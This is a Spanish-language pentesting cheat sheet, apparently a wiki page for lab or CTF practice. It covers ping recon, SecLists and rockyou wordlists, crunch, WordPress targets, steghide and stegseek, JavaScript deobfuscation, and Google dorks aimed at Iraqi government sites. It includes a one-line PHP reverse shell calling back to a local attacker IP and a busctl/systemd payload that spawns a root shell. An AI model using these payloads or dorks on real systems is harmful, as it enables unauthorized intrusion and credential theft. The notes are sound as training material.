¡Esta es una revisión vieja del documento!
Normalmente siempre es conveniente saber cual es la ip
Ver si responde a pings y observar el trazado
ping -c1 192.168.0.213 -R PING 192.168.0.213 (192.168.0.213) 56(124) bytes of data. 64 bytes from 192.168.0.213: icmp_seq=1 ttl=64 time=1.75 ms RR: 192.168.0.93 (atacante) 192.168.0.213 (víctima) 192.168.0.213 (víctima) 192.168.0.93 (atacante) --- 192.168.0.213 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 1.746/1.746/1.746/0.000 ms
parámetros básicos y más utilizados
Ver si revela alguna información
Es específico para servidores web y útil si no sabemos interpretar bien los encabezados http del comando anterior
Fuerza bruta y pistas
Estructura, carpetas de seclists y archivos de interés | |
---|---|
Discovery | Directorios y archivos en servidores web |
Pattern-Matching | Patrones para extraer información sensible |
Routers | Usuarios, contraseñas por defecto en routers |
Fuzzing | Pruebas para identificar vulnerabilidades |
Miscellaneous | SQL injection, cross-site scripting (XSS) |
Passwords,Usernames | Ataques de fuerza bruta |
User-Agents | Cadenas para simular navegadores web y dispositivos |
Discovery/Web-Content/Logins.fuzz.txt | Paneles de login web .php,.asp,.rb,.py,logon.py etc |
Descargar, conocer seclists, un conjunto de diccionarios de fuerza bruta para poder hacer fuzzing
crunch 14 14 ABCD123 -t pepe@@%%casa@@ > diccionario.txt Crunch will now generate the following amount of data: 3601500 bytes 3 MB 0 GB 0 TB 0 PB Crunch will now generate the following number of lines: 240100
Descargar, conocer rockyou, un diccionario para poder hacer fuerza bruta con contraseñas al panel de login, ssh, etc
Identificar aplicaciones web instaladas, CMS
wp-admin | Redirecciona a wp-login.php, Panel de login |
wp-login.php | Panel de login |
xmlrpc.php | Usado para hacer fuerza bruta con wpscan, más rápido que al panel de login con hydra |
wp-config.php | Contiene nombres de usuario y contraseñas de bases de datos |
Buscar vulnerabilidades para las versiones detectadas de los servicios descubiertos
Muchas veces hay fotografías que contienen información oculta
steghide info foto.jpg "foto.jpg": formato: jpeg capacidad: 5,6 KB �Intenta informarse sobre los datos adjuntos? (s/n) s Anotar salvoconducto:
Se puede intentar hacer fuerza bruta
stegseek foto.jpg ../Descargas/rockyou.txt StegSeek 0.6 - https://github.com/RickdeJager/StegSeek [i] Progress: 99.75% (133.1 MB) [!] error: Could not find a valid passphrase.
echo hola | xxd -p 686f6c610a echo 686f6c610a | xxd -r -p hola
desofuscar javascript con jsnice
var _0x55ae=["\x48\x65\x6C\x6C\x6F \x20\x57\x6F\x72\x6C\x64\x21", "\x0A","\x4F\x4B"];var a=_0x55ae[0]; function MsgBox(_0x9e43x3){ alert(_0x9e43x3+_0x55ae[1]+a);} ; MsgBox(_0x55ae[2]); | /** @type {Array} */ var _0x55ae = ["Hello World!", "\n", "OK"]; var a = _0x55ae[0]; /** * @param {?} alertCallback * @return {undefined} */ function MsgBox(alertCallback) { alert(alertCallback + _0x55ae[1] + a); } MsgBox(_0x55ae[2]); |
gov site:.iq → obtiene dominios y subdominios de iraq
gov site:.iq filetype:pdf → obtiene archivos pdf de dominios y subdominios de iraq
gov site:.iq inurl:admin → obtiene resultados que contengan la palabra “admin” en las urls de dominios y subdominios de iraq
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.93/8080 0>&1'"); ?>
#!/bin/bash bash
sudo | Ejecuta con privilegios de root (necesario para cambiar propiedades de systemd) |
busctl | Herramienta para interactuar con D-Bus |
set-property | Subcomando de busctl para cambiar una propiedad expuesta vía D-Bus |
org.freedesktop.systemd1 | Servicio D-Bus de systemd |
/org/freedesktop/systemd1 | Objeto D-Bus raíz que representa al gestor de systemd |
org.freedesktop.systemd1.Manager | Interfaz D-Bus que gestiona systemd, Contiene propiedades y métodos para controlar systemd (iniciar/parar servicios, cambiar configuraciones, etc). |
LogLevel | Propiedad que se va a modificar |
s | Tipo de dato: s = string (en la notación de tipos de D-Bus) |
debug | Nuevo valor: debug (valor de la propiedad LogLevel) |
argv1=-c | Primer argumento pasado a /bin/sh, -c significa “ejecuta el siguiente comando como script |
argv2='/bin/sh -i | Ejecuta la shell en modo interactivo |
0<&2 | Redirige stderr a entrada estandar |
1>&2 | Redirige Salida estandar a stdrr |
…..continuará. Feliz hacking